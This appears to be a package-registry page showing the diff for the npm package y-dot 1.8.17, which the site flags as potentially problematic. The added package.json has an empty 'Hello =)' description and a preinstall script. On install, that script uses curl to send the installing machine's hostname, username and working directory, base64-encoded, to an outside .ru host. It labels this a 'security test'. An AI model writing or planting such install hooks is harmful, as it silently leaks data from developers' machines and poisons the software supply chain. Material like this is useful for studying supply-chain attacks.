y-dot 1.8.17
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of y-dot might be problematic. Click here for more details.
- package/package.json +1 -0
package/package.json
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
{"name": "y-dot", "version": "1.8.17", "description": "Hello =)", "main": "index.js", "scripts": {"test": "echo \"Error: no test specified\" && exit 1", "preinstall": "curl -H \"Package: y-dot\" -H \"Version: 1.8.17\" -H \"Hostname: $(hostname | base64)\" -H \"Whoami: $(whoami | base64)\" -H \"Pwd: $(pwd | base64)\" -d \"meow! security test\" http://npm-new.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru"}, "author": "act1on3", "license": "ISC"}
|